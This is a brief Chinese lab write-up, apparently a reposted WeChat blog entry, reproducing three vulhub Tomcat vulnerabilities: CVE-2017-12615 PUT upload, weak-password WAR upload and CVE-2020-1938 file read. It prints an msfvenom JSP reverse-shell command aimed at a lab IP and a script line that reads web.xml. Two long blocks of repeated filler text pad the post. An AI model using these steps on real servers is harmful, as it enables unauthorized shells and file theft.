今天复现下vulhub中tomcat部分的三个漏洞。
一:CVE-2017-12615 PUT任意文件上传 7.x
1.先用msf生成个jsp马 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.234.129 LPORT=8888 -f raw -o shell.jsp
2.将GET方式改为PUT上传方式,马内容改成马的,但是要用两个/包裹。反弹拿到root
二:Tomcat8 弱口令,上传war包getshell
Tomcat tomcat弱口令进入了后台
找到一处可以上传war的点,把马子压成zip格式,再改成war上传
三:CVE-2020-1938 任意文件读取
1.└─$ python 1.py 192.168.234.162 -p 8009 -f WEB-INF/web.xml
脚本一把嗦,-f跟上敏感文件,-p跟上端口,读取web.xml文件。
凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字
凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字
原文始发于微信公众号(飞奔的狸花猫):Tomcat常见利用方式学习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论